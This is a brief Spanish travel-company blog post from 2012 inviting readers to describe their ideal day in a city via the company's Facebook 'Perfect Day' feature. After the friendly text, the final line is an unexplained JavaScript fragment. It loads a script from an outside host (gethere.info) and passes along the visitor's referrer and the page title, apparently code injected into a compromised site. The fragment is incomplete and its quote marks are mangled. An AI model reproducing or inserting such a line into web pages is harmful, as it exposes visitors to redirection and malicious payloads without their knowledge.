¿Cómo sería vuestro Perfect Day en uno de nuestros destinos?

11/07/2012

Seguro que si os preguntamos cómo ha sido vuestro día perfecto en cada uno de los viajes que habéis realizado, se os ocurren un montón de posibilidades en destinos diferentes :-). Pues bien, desde nuestra página en Facebook, os invitamos a que lo compartáis con nosotros y el resto de viajeros a través de Perfect Day y forméis parte de nuestra guía de viajes particular.

En este link, podéis consultar todas las opciones que ya nos han indicado algunos viajeros y añadir el vuestro. Es muy sencillo, solo tenéis que elegir una ciudad que hayáis visitado o que visitaréis muy pronto y describir cómo sería vuestro día perfecto en ella. La mejor ruta para disfrutar de la ciudad, vuestras actividades culturales favoritas, los mejores lugares para ir de compras, paradas obligatorias para disfrutar de la gastronomía del lugar, y todas las recomendaciones para todos los futuros viajeros que decidan visitar la ciudad.

¿Os animáis? 🙂

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;